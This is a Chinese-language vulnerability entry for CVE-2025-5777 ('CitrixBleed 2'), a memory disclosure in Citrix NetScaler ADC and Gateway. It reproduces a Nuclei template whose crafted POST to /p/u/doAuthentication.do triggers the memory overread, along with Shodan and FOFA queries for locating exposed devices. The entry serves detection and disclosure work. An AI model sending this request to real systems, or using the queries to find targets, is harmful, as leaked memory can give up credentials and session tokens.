Citrix NetScaler Memory Disclosure - CitrixBleed 2

漏洞信息

漏洞名称： Citrix NetScaler Memory Disclosure - CitrixBleed 2

漏洞编号：

• CVE： CVE-2025-5777

漏洞类型： 信息泄露

漏洞等级： 严重

漏洞描述： Citrix NetScaler是一款广泛使用的应用交付控制器和网关设备，常见于企业级网络环境中，用于优化应用性能、确保应用安全以及提供远程访问解决方案。由于其广泛部署，NetScaler的安全问题可能对大量企业和组织造成影响。

该漏洞被标识为CVE-2025-5777，属于信息泄露类型，由于NetScaler管理界面的输入验证不足导致内存过度读取。具体来说，攻击者可以通过构造特定的请求，触发内存读取操作，从而泄露敏感信息。这种漏洞的技术根源在于处理用户输入时未能充分验证和限制，导致可以访问到不应被外部访问的内存区域。

此漏洞的影响极为严重，因为它允许攻击者在无需认证的情况下远程读取内存信息，可能导致敏感数据泄露，包括但不限于用户凭证、会话令牌等。由于漏洞的利用门槛相对较低，且存在公开的利用方法，使得该漏洞的风险等级被评定为严重。攻击者可以利用泄露的信息进一步实施攻击，如会话劫持、身份冒充等，对受影响系统的安全构成重大威胁。

产品厂商： Citrix

产品名称： NetScaler ADC, NetScaler Gateway

搜索语法： title:”NetScaler Gateway”, title:”NetScaler AAA”, http.favicon.hash:-1166125415, http.favicon.hash:-1292923998, title=”NetScaler Gateway”, title=”NetScaler AAA”, icon_hash=”-1166125415”, icon_hash=”-1292923998”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/db8f08d0de218239ca4fe68048b20e634f0ebfe6/http%2Fcves%2F2025%2FCVE-2025-5777.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-5777

info:
  name: Citrix NetScaler Memory Disclosure - CitrixBleed 2
  author: watchtowr,DhiyaneshDk,darses
  severity: critical
  description: |
    Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway
  reference:
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420
    - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5777
  classification:
    epss-score: 0.00042
    epss-percentile: 0.12361
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - title:"NetScaler Gateway"
      - title:"NetScaler AAA"
      - http.favicon.hash:-1166125415
      - http.favicon.hash:-1292923998
    fofa-query:
      - title="NetScaler Gateway"
      - title="NetScaler AAA"
      - icon_hash="-1166125415"
      - icon_hash="-1292923998"
  tags: cve,cve2025,netscaler,citrix,exposure

http:
  - raw:
      - |+
        POST /p/u/doAuthentication.do HTTP/1.0
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Content-Length: 5

        login

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<InitialValue></InitialValue><Constraint>"
          - "<InitialValue/><Constraint>"
        negative: true

      - type: word
        part: content_type
        words:
          - "application/vnd.citrix.authenticateresponse"

      - type: status
        status:
          - 200